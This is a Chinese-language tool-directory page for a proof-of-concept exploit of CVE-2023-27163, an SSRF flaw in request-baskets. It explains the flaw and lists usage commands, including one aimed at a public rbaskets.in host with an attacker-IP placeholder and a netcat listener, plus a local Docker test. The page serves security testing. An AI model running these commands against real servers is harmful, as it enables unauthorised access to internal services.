Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-27163 — 针对 request-baskets (V<= v.1.2.1) 的服务器端请求伪造 (SSRF) 概念验证 | Kitploit
工具/GitHubGitHub/mastercode112/cve-2023-27163
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubmastercode112/cve-2023-27163

CVE-2023-27163

针对 request-baskets (V<= v.1.2.1) 的服务器端请求伪造 (SSRF) 概念验证

查看仓库
212年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Request-Baskets 上的 SSRF 概念验证 (CVE-2023-27163)

本仓库包含 CVE-2023-27163 的概念验证代码 (PoC),该漏洞是 request-baskets 直至 1.2.1 版本 中存在的一个服务端请求伪造 (SSRF) 漏洞。攻击者可利用精心构造的 API 请求,通过 /api/baskets/{name} 组件访问网络资源和敏感信息。

使用方法

root@kitploit:~
git clone https://github.com/MasterCode112/CVE-2023-27163.git
bash ./CVE-2023-27163.sh https://rbaskets.in/ <攻击者 IP>

工作原理是什么?

Request-baskets 是一个 Web 应用程序,用于收集并注册特定路由上的请求,该路由称为“篮子”(basket)。在创建篮子时,用户可以指定另一台服务器来转发请求。问题在于,用户可以指定非预期的服务,例如网络封闭的应用程序。

例如:假设服务器上运行着 Request-baskets(端口 55555)和一个 Flask Web 服务器(端口 8000)。Flask 同时配置为仅与本地主机交互。通过创建一个将请求转发到 http://localhost:8000 的篮子,攻击者便可以访问此前受限的 Flask Web 服务器。

在本地主机上进行测试

PoC 图片

  1. 启动 Request-Baskets 的 Docker 容器
root@kitploit:~
docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
``` git clone https://github.com/MasterCode112/CVE-2023-27163.git

2. 下载 PoC

```shell
git clone https://github.com/MasterCode112/CVE-2023-27163.git
  1. 等待连接
root@kitploit:~
nc -lvp 8000
  1. 保存 Docker 主机的 IP 地址
root@kitploit:~
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
  1. 运行 PoC
root@kitploit:~
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/
下载工具